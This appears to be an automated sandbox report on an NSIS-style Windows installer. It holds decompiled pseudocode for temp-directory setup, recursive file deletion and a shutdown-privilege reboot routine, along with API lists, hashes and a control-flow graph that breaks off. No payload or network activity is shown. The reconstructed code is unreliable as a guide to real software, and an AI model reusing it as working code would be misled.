                                                          										GetTempPathW(0x3fc, _t234);
                                                          										lstrcatW(_t234, L"Low");
                                                          										SetEnvironmentVariableW(L"TEMP", _t234);
                                                          										SetEnvironmentVariableW(L"TMP", _t234);
                                                          										_t175 = E0040360F(_t198, _t253);
                                                          										_t254 = _t175;
                                                          										if(_t175 == 0) {
                                                          											goto L68;
                                                          										}
                                                          										goto L40;
                                                          									}
                                                          									goto L31;
                                                          								}
                                                          								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                                                          								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                                                          									goto L29;
                                                          								}
                                                          								_t177 =  *((intOrPtr*)(_t198 + 8));
                                                          								__eflags = _t177 - 0x20;
                                                          								if(_t177 == 0x20) {
                                                          									L28:
                                                          									_t36 =  &_v20;
                                                          									 *_t36 = _v20 | 0x00000004;
                                                          									__eflags =  *_t36;
                                                          									goto L29;
                                                          								}
                                                          								__eflags = _t177 - _t188;
                                                          								if(_t177 != _t188) {
                                                          									goto L29;
                                                          								}
                                                          								goto L28;
                                                          							}
                                                          							_t178 =  *((intOrPtr*)(_t198 + 2));
                                                          							__eflags = _t178 - _t209;
                                                          							if(_t178 == _t209) {
                                                          								L23:
                                                          								 *0x42a300 = 1;
                                                          								goto L24;
                                                          							}
                                                          							__eflags = _t178 - _t188;
                                                          							if(_t178 != _t188) {
                                                          								goto L24;
                                                          							}
                                                          							goto L23;
                                                          						}
                                                          					} else {
                                                          						goto L16;
                                                          					}
                                                          					do {
                                                          						L16:
                                                          						_t198 = _t198 + 2;
                                                          						__eflags =  *_t198 - _t209;
                                                          					} while ( *_t198 == _t209);
                                                          					goto L17;
                                                          				}
                                                          				goto L37;
                                                          			}















































                                                          0x0040364e
                                                          0x0040364f
                                                          0x00403656
                                                          0x00403659
                                                          0x00403660
                                                          0x00403663
                                                          0x00403676
                                                          0x0040367c
                                                          0x0040367f
                                                          0x00403682
                                                          0x00403690
                                                          0x00403698
                                                          0x004036a3
                                                          0x004036bc
                                                          0x004036be
                                                          0x004036c6
                                                          0x004036c6
                                                          0x004036d1
                                                          0x004036d3
                                                          0x004036d3
                                                          0x004036e8
                                                          0x0040370d
                                                          0x0040371b
                                                          0x0040371e
                                                          0x00403725
                                                          0x0040372c
                                                          0x0040372c
                                                          0x00403725
                                                          0x0040372e
                                                          0x00403733
                                                          0x00403734
                                                          0x00403740
                                                          0x00403744
                                                          0x0040374b
                                                          0x00403759
                                                          0x0040375e
                                                          0x00403765
                                                          0x00403769
                                                          0x0040376d
                                                          0x0040376f
                                                          0x0040376f
                                                          0x0040376d
                                                          0x00403776
                                                          0x0040377d
                                                          0x00403783
                                                          0x0040379b
                                                          0x004037ab
                                                          0x004037bd
                                                          0x004037c4
                                                          0x004037c6
                                                          0x004037c7
                                                          0x004037d8
                                                          0x004037dc
                                                          0x004037dc
                                                          0x004037ef
                                                          0x004037f1
                                                          0x004038eb
                                                          0x004038eb
                                                          0x004038ee
                                                          0x004038f1
                                                          0x00000000
                                                          0x00000000
                                                          0x004037fb
                                                          0x004037fc
                                                          0x004037ff
                                                          0x00403808
                                                          0x00403808
                                                          0x0040380b
                                                          0x0040380e
                                                          0x00403811
                                                          0x00403814
                                                          0x00403814
                                                          0x00403814
                                                          0x00403815
                                                          0x00403819
                                                          0x004038d9
                                                          0x004038e2
                                                          0x004038e4
                                                          0x004038e7
                                                          0x004038ea
                                                          0x004038ea
                                                          0x004038ea
                                                          0x00000000
                                                          0x0040381f
                                                          0x00403820
                                                          0x00403821
                                                          0x00403825
                                                          0x0040383f
                                                          0x00403846
                                                          0x00403859
                                                          0x0040385a
                                                          0x0040386f
                                                          0x00403874
                                                          0x00403876
                                                          0x00403878
                                                          0x00403894
                                                          0x0040389b
                                                          0x004038ae
                                                          0x004038af
                                                          0x004038c4
                                                          0x004038ca
                                                          0x004038cc
                                                          0x004038ce
                                                          0x004038d6
                                                          0x004038d8
                                                          0x00000000
                                                          0x004038d8
                                                          0x004038d2
                                                          0x004038d4
                                                          0x004038f9
                                                          0x004038fd
                                                          0x00403906
                                                          0x0040390b
                                                          0x00403911
                                                          0x0040391c
                                                          0x0040391e
                                                          0x00403923
                                                          0x00403925
                                                          0x0040397d
                                                          0x00403982
                                                          0x0040398b
                                                          0x00403992
                                                          0x00403995
                                                          0x00403b6c
                                                          0x00403b6c
                                                          0x00403b71
                                                          0x00403b7a
                                                          0x00403b97
                                                          0x00403c0f
                                                          0x00403c0f
                                                          0x00403c17
                                                          0x00403c19
                                                          0x00403c19
                                                          0x00403c1f
                                                          0x00403c1f
                                                          0x00403bae
                                                          0x00403bba
                                                          0x00403bcb
                                                          0x00403bd2
                                                          0x00403bd9
                                                          0x00403bd9
                                                          0x00403be1
                                                          0x00403bed
                                                          0x00403bfb
                                                          0x00403c06
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403bef
                                                          0x00403bef
                                                          0x00403bf0
                                                          0x00403bf2
                                                          0x00403bf3
                                                          0x00403bf4
                                                          0x00403bf9
                                                          0x00403c08
                                                          0x00403c0a
                                                          0x00000000
                                                          0x00403c0a
                                                          0x00000000
                                                          0x00403bf9
                                                          0x00403bed
                                                          0x00403b84
                                                          0x00403b8b
                                                          0x00403b8b
                                                          0x004039a1
                                                          0x00403a48
                                                          0x00403a48
                                                          0x00403a54
                                                          0x00000000
                                                          0x00403a54
                                                          0x004039b2
                                                          0x004039ba
                                                          0x00403a0c
                                                          0x00403a0c
                                                          0x00403a12
                                                          0x00403a19
                                                          0x00403a67
                                                          0x00403a69
                                                          0x00403a6e
                                                          0x00403a70
                                                          0x00403a78
                                                          0x00403a78
                                                          0x00403a83
                                                          0x00403a8f
                                                          0x00403a95
                                                          0x00403a97
                                                          0x00403b6a
                                                          0x00403b6a
                                                          0x00403b6a
                                                          0x00000000
                                                          0x00403a9d
                                                          0x00403a9d
                                                          0x00403a9f
                                                          0x00403aa0
                                                          0x00403aa9
                                                          0x00403aa2
                                                          0x00403aa2
                                                          0x00403aa2
                                                          0x00403aaf
                                                          0x00403ab7
                                                          0x00403abe
                                                          0x00403ac6
                                                          0x00403ac6
                                                          0x00403ad3
                                                          0x00403adf
                                                          0x00403ae9
                                                          0x00403ae9
                                                          0x00403aeb
                                                          0x00403af2
                                                          0x00403afc
                                                          0x00403b08
                                                          0x00403b0e
                                                          0x00403b14
                                                          0x00403b17
                                                          0x00403b21
                                                          0x00403b27
                                                          0x00403b29
                                                          0x00403b2d
                                                          0x00403b3e
                                                          0x00403b44
                                                          0x00403b49
                                                          0x00403b4b
                                                          0x00403b4e
                                                          0x00403b54
                                                          0x00403b54
                                                          0x00403b4b
                                                          0x00403b29
                                                          0x00403b57
                                                          0x00403b5e
                                                          0x00403b5e
                                                          0x00403b5e
                                                          0x00403b5e
                                                          0x00403b65
                                                          0x00000000
                                                          0x00403b65
                                                          0x00403a97
                                                          0x00403a1b
                                                          0x00403a1e
                                                          0x00403a22
                                                          0x00403a27
                                                          0x00403a29
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a35
                                                          0x00403a40
                                                          0x00403a45
                                                          0x00000000
                                                          0x00403a45
                                                          0x004039c3
                                                          0x004039db
                                                          0x004039ec
                                                          0x004039ed
                                                          0x004039f1
                                                          0x004039f3
                                                          0x00403a01
                                                          0x00403a08
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403a08
                                                          0x00403a0a
                                                          0x00000000
                                                          0x00403a0a
                                                          0x0040392d
                                                          0x00403939
                                                          0x0040393e
                                                          0x00403943
                                                          0x00403945
                                                          0x00000000
                                                          0x00000000
                                                          0x0040394d
                                                          0x00403955
                                                          0x00403966
                                                          0x0040396e
                                                          0x00403970
                                                          0x00403975
                                                          0x00403977
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403977
                                                          0x00000000
                                                          0x004038d4
                                                          0x0040387d
                                                          0x0040387f
                                                          0x00000000
                                                          0x00000000
                                                          0x00403881
                                                          0x00403885
                                                          0x00403889
                                                          0x00403890
                                                          0x00403890
                                                          0x00403890
                                                          0x00403890
                                                          0x00000000
                                                          0x00403890
                                                          0x0040388b
                                                          0x0040388e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040388e
                                                          0x00403827
                                                          0x0040382b
                                                          0x0040382e
                                                          0x00403835
                                                          0x00403835
                                                          0x00000000
                                                          0x00403835
                                                          0x00403830
                                                          0x00403833
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403833
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00403801
                                                          0x00403801
                                                          0x00403802
                                                          0x00403803
                                                          0x00403803
                                                          0x00000000
                                                          0x00403801
                                                          0x00000000

                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                          • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                          • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                          • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                          • OleInitialize.OLE32(00000000), ref: 0040377D
                                                          • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                          • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                          • CharNextW.USER32(00000000,00435000,00000020,00435000,00000000), ref: 004037E9
                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                          • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                                                            • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,00435000,00000000,?), ref: 00403A8F
                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                          • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\file.exe,00420F08,00000001), ref: 00403B21
                                                          • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                          • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                          • OleUninitialize.OLE32(?), ref: 00403B71
                                                          • ExitProcess.KERNEL32 ref: 00403B8B
                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                          • ExitProcess.KERNEL32 ref: 00403C1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                          • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\file.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                          • API String ID: 2292928366-1479915532
                                                          • Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                          • Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
                                                          • Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
                                                          • Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 395 405d74-405d9a call 40603f 398 405db3-405dba 395->398 399 405d9c-405dae DeleteFileW 395->399 401 405dbc-405dbe 398->401 402 405dcd-405ddd call 406668 398->402 400 405f30-405f34 399->400 403 405dc4-405dc7 401->403 404 405ede-405ee3 401->404 410 405dec-405ded call 405f83 402->410 411 405ddf-405dea lstrcatW 402->411 403->402 403->404 404->400 406 405ee5-405ee8 404->406 408 405ef2-405efa call 40699e 406->408 409 405eea-405ef0 406->409 408->400 419 405efc-405f10 call 405f37 call 405d2c 408->419 409->400 414 405df2-405df6 410->414 411->414 415 405e02-405e08 lstrcatW 414->415 416 405df8-405e00 414->416 418 405e0d-405e29 lstrlenW FindFirstFileW 415->418 416->415 416->418 420 405ed3-405ed7 418->420 421 405e2f-405e37 418->421 435 405f12-405f15 419->435 436 405f28-405f2b call 4056ca 419->436 420->404 426 405ed9 420->426 423 405e57-405e6b call 406668 421->423 424 405e39-405e41 421->424 437 405e82-405e8d call 405d2c 423->437 438 405e6d-405e75 423->438 427 405e43-405e4b 424->427 428 405eb6-405ec6 FindNextFileW 424->428 426->404 427->423 431 405e4d-405e55 427->431 428->421 434 405ecc-405ecd FindClose 428->434 431->423 431->428 434->420 435->409 441 405f17-405f26 call 4056ca call 406428 435->441 436->400 446 405eae-405eb1 call 4056ca 437->446 447 405e8f-405e92 437->447 438->428 442 405e77-405e80 call 405d74 438->442 441->400 442->428 446->428 450 405e94-405ea4 call 4056ca call 406428 447->450 451 405ea6-405eac 447->451 450->428 451->428
                                                          C-Code - Quality: 98%
                                                          			E00405D74(void* __eflags, signed int _a4, signed int _a8) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				short _v556;
                                                          				short _v558;
                                                          				struct _WIN32_FIND_DATAW _v604;
                                                          				signed int _t38;
                                                          				signed int _t52;
                                                          				signed int _t55;
                                                          				signed int _t62;
                                                          				void* _t64;
                                                          				signed char _t65;
                                                          				WCHAR* _t66;
                                                          				void* _t67;
                                                          				WCHAR* _t68;
                                                          				void* _t70;
                                                          
                                                          				_t65 = _a8;
                                                          				_t68 = _a4;
                                                          				_v8 = _t65 & 0x00000004;
                                                          				_t38 = E0040603F(__eflags, _t68);
                                                          				_v12 = _t38;
                                                          				if((_t65 & 0x00000008) != 0) {
                                                          					_t62 = DeleteFileW(_t68); // executed
                                                          					asm("sbb eax, eax");
                                                          					_t64 =  ~_t62 + 1;
                                                          					 *0x42a2e8 =  *0x42a2e8 + _t64;
                                                          					return _t64;
                                                          				}
                                                          				_a4 = _t65;
                                                          				_t8 =  &_a4;
                                                          				 *_t8 = _a4 & 0x00000001;
                                                          				__eflags =  *_t8;
                                                          				if( *_t8 == 0) {
                                                          					L5:
                                                          					E00406668(0x425750, _t68);
                                                          					__eflags = _a4;
                                                          					if(_a4 == 0) {
                                                          						E00405F83(_t68);
                                                          					} else {
                                                          						lstrcatW(0x425750, L"\\*.*");
                                                          					}
                                                          					__eflags =  *_t68;
                                                          					if( *_t68 != 0) {
                                                          						L10:
                                                          						lstrcatW(_t68, 0x40a014);
                                                          						L11:
                                                          						_t66 =  &(_t68[lstrlenW(_t68)]);
                                                          						_t38 = FindFirstFileW(0x425750,  &_v604); // executed
                                                          						_t70 = _t38;
                                                          						__eflags = _t70 - 0xffffffff;
                                                          						if(_t70 == 0xffffffff) {
                                                          							L26:
                                                          							__eflags = _a4;
                                                          							if(_a4 != 0) {
                                                          								_t30 = _t66 - 2;
                                                          								 *_t30 =  *(_t66 - 2) & 0x00000000;
                                                          								__eflags =  *_t30;
                                                          							}
                                                          							goto L28;
                                                          						} else {
                                                          							goto L12;
                                                          						}
                                                          						do {
                                                          							L12:
                                                          							__eflags = _v604.cFileName - 0x2e;
                                                          							if(_v604.cFileName != 0x2e) {
                                                          								L16:
                                                          								E00406668(_t66,  &(_v604.cFileName));
                                                          								__eflags = _v604.dwFileAttributes & 0x00000010;
                                                          								if(__eflags == 0) {
                                                          									_t52 = E00405D2C(__eflags, _t68, _v8);
                                                          									__eflags = _t52;
                                                          									if(_t52 != 0) {
                                                          										E004056CA(0xfffffff2, _t68);
                                                          									} else {
                                                          										__eflags = _v8 - _t52;
                                                          										if(_v8 == _t52) {
                                                          											 *0x42a2e8 =  *0x42a2e8 + 1;
                                                          										} else {
                                                          											E004056CA(0xfffffff1, _t68);
                                                          											E00406428(_t67, _t68, 0);
                                                          										}
                                                          									}
                                                          								} else {
                                                          									__eflags = (_a8 & 0x00000003) - 3;
                                                          									if(__eflags == 0) {
                                                          										E00405D74(__eflags, _t68, _a8);
                                                          									}
                                                          								}
                                                          								goto L24;
                                                          							}
                                                          							__eflags = _v558;
                                                          							if(_v558 == 0) {
                                                          								goto L24;
                                                          							}
                                                          							__eflags = _v558 - 0x2e;
                                                          							if(_v558 != 0x2e) {
                                                          								goto L16;
                                                          							}
                                                          							__eflags = _v556;
                                                          							if(_v556 == 0) {
                                                          								goto L24;
                                                          							}
                                                          							goto L16;
                                                          							L24:
                                                          							_t55 = FindNextFileW(_t70,  &_v604); // executed
                                                          							__eflags = _t55;
                                                          						} while (_t55 != 0);
                                                          						_t38 = FindClose(_t70); // executed
                                                          						goto L26;
                                                          					}
                                                          					__eflags =  *0x425750 - 0x5c;
                                                          					if( *0x425750 != 0x5c) {
                                                          						goto L11;
                                                          					}
                                                          					goto L10;
                                                          				} else {
                                                          					__eflags = _t38;
                                                          					if(_t38 == 0) {
                                                          						L28:
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							L36:
                                                          							return _t38;
                                                          						}
                                                          						__eflags = _v12;
                                                          						if(_v12 != 0) {
                                                          							_t38 = E0040699E(_t68);
                                                          							__eflags = _t38;
                                                          							if(_t38 == 0) {
                                                          								goto L36;
                                                          							}
                                                          							E00405F37(_t68);
                                                          							_t38 = E00405D2C(__eflags, _t68, _v8 | 0x00000001);
                                                          							__eflags = _t38;
                                                          							if(_t38 != 0) {
                                                          								return E004056CA(0xffffffe5, _t68);
                                                          							}
                                                          							__eflags = _v8;
                                                          							if(_v8 == 0) {
                                                          								goto L30;
                                                          							}
                                                          							E004056CA(0xfffffff1, _t68);
                                                          							return E00406428(_t67, _t68, 0);
                                                          						}
                                                          						L30:
                                                          						 *0x42a2e8 =  *0x42a2e8 + 1;
                                                          						return _t38;
                                                          					}
                                                          					__eflags = _t65 & 0x00000002;
                                                          					if((_t65 & 0x00000002) == 0) {
                                                          						goto L28;
                                                          					}
                                                          					goto L5;
                                                          				}
                                                          			}


















                                                          0x00405d7e
                                                          0x00405d83
                                                          0x00405d8c
                                                          0x00405d8f
                                                          0x00405d97
                                                          0x00405d9a
                                                          0x00405d9d
                                                          0x00405da5
                                                          0x00405da7
                                                          0x00405da8
                                                          0x00000000
                                                          0x00405da8
                                                          0x00405db3
                                                          0x00405db6
                                                          0x00405db6
                                                          0x00405db6
                                                          0x00405dba
                                                          0x00405dcd
                                                          0x00405dd4
                                                          0x00405dd9
                                                          0x00405ddd
                                                          0x00405ded
                                                          0x00405ddf
                                                          0x00405de5
                                                          0x00405de5
                                                          0x00405df2
                                                          0x00405df6
                                                          0x00405e02
                                                          0x00405e08
                                                          0x00405e0d
                                                          0x00405e13
                                                          0x00405e1e
                                                          0x00405e24
                                                          0x00405e26
                                                          0x00405e29
                                                          0x00405ed3
                                                          0x00405ed3
                                                          0x00405ed7
                                                          0x00405ed9
                                                          0x00405ed9
                                                          0x00405ed9
                                                          0x00405ed9
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e2f
                                                          0x00405e2f
                                                          0x00405e2f
                                                          0x00405e37
                                                          0x00405e57
                                                          0x00405e5f
                                                          0x00405e64
                                                          0x00405e6b
                                                          0x00405e86
                                                          0x00405e8b
                                                          0x00405e8d
                                                          0x00405eb1
                                                          0x00405e8f
                                                          0x00405e8f
                                                          0x00405e92
                                                          0x00405ea6
                                                          0x00405e94
                                                          0x00405e97
                                                          0x00405e9f
                                                          0x00405e9f
                                                          0x00405e92
                                                          0x00405e6d
                                                          0x00405e73
                                                          0x00405e75
                                                          0x00405e7b
                                                          0x00405e7b
                                                          0x00405e75
                                                          0x00000000
                                                          0x00405e6b
                                                          0x00405e39
                                                          0x00405e41
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e43
                                                          0x00405e4b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405e4d
                                                          0x00405e55
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405eb6
                                                          0x00405ebe
                                                          0x00405ec4
                                                          0x00405ec4
                                                          0x00405ecd
                                                          0x00000000
                                                          0x00405ecd
                                                          0x00405df8
                                                          0x00405e00
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405dbc
                                                          0x00405dbc
                                                          0x00405dbe
                                                          0x00405ede
                                                          0x00405ee0
                                                          0x00405ee3
                                                          0x00405f34
                                                          0x00405f34
                                                          0x00405f34
                                                          0x00405ee5
                                                          0x00405ee8
                                                          0x00405ef3
                                                          0x00405ef8
                                                          0x00405efa
                                                          0x00000000
                                                          0x00000000
                                                          0x00405efd
                                                          0x00405f09
                                                          0x00405f0e
                                                          0x00405f10
                                                          0x00000000
                                                          0x00405f2b
                                                          0x00405f12
                                                          0x00405f15
                                                          0x00000000
                                                          0x00000000
                                                          0x00405f1a
                                                          0x00000000
                                                          0x00405f21
                                                          0x00405eea
                                                          0x00405eea
                                                          0x00000000
                                                          0x00405eea
                                                          0x00405dc4
                                                          0x00405dc7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405dc7

                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,766DFAA0,766DF560,00000000), ref: 00405D9D
                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd8C07.tmp\*.*,\*.*), ref: 00405DE5
                                                          • lstrcatW.KERNEL32(?,0040A014), ref: 00405E08
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsd8C07.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E0E
                                                          • FindFirstFileW.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsd8C07.tmp\*.*,?,?,?,0040A014,?,C:\Users\user\AppData\Local\Temp\nsd8C07.tmp\*.*,?,?,766DFAA0,766DF560,00000000), ref: 00405E1E
                                                          • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                          • FindClose.KERNELBASE(00000000), ref: 00405ECD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: .$.$C:\Users\user\AppData\Local\Temp\nsd8C07.tmp\*.*$\*.*
                                                          • API String ID: 2035342205-2410731285
                                                          • Opcode ID: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                          • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                          • Opcode Fuzzy Hash: eb4081a649fdbb44c8907daec76b44e1c805ca5b036c6d0867ef95af4715127c
                                                          • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 553 406d5f-406d64 554 406dd5-406df3 553->554 555 406d66-406d95 553->555 556 4073cb-4073e0 554->556 557 406d97-406d9a 555->557 558 406d9c-406da0 555->558 559 4073e2-4073f8 556->559 560 4073fa-407410 556->560 561 406dac-406daf 557->561 562 406da2-406da6 558->562 563 406da8 558->563 564 407413-40741a 559->564 560->564 565 406db1-406dba 561->565 566 406dcd-406dd0 561->566 562->561 563->561 570 407441-40744d 564->570 571 40741c-407420 564->571 567 406dbc 565->567 568 406dbf-406dcb 565->568 569 406fa2-406fc0 566->569 567->568 572 406e35-406e63 568->572 576 406fc2-406fd6 569->576 577 406fd8-406fea 569->577 579 406be3-406bec 570->579 573 407426-40743e 571->573 574 4075cf-4075d9 571->574 580 406e65-406e7d 572->580 581 406e7f-406e99 572->581 573->570 578 4075e5-4075f8 574->578 582 406fed-406ff7 576->582 577->582 586 4075fd-407601 578->586 583 406bf2 579->583 584 4075fa 579->584 585 406e9c-406ea6 580->585 581->585 587 406ff9 582->587 588 406f9a-406fa0 582->588 590 406bf9-406bfd 583->590 591 406d39-406d5a 583->591 592 406c9e-406ca2 583->592 593 406d0e-406d12 583->593 584->586 595 406eac 585->595 596 406e1d-406e23 585->596 604 407581-40758b 587->604 605 406f7f-406f97 587->605 588->569 594 406f3e-406f48 588->594 590->578 597 406c03-406c10 590->597 591->556 606 406ca8-406cc1 592->606 607 40754e-407558 592->607 598 406d18-406d2c 593->598 599 40755d-407567 593->599 600 40758d-407597 594->600 601 406f4e-407117 594->601 612 406e02-406e1a 595->612 613 407569-407573 595->613 602 406ed6-406edc 596->602 603 406e29-406e2f 596->603 597->584 611 406c16-406c5c 597->611 614 406d2f-406d37 598->614 599->578 600->578 601->579 609 406f3a 602->609 610 406ede-406efc 602->610 603->572 603->609 604->578 605->588 616 406cc4-406cc8 606->616 607->578 609->594 617 406f14-406f26 610->617 618 406efe-406f12 610->618 619 406c84-406c86 611->619 620 406c5e-406c62 611->620 612->596 613->578 614->591 614->593 616->592 621 406cca-406cd0 616->621 624 406f29-406f33 617->624 618->624 627 406c94-406c9c 619->627 628 406c88-406c92 619->628 625 406c64-406c67 GlobalFree 620->625 626 406c6d-406c7b GlobalAlloc 620->626 622 406cd2-406cd9 621->622 623 406cfa-406d0c 621->623 629 406ce4-406cf4 GlobalAlloc 622->629 630 406cdb-406cde GlobalFree 622->630 623->614 624->602 631 406f35 624->631 625->626 626->584 632 406c81 626->632 627->616 628->627 628->628 629->584 629->623 630->629 634 407575-40757f 631->634 635 406ebb-406ed3 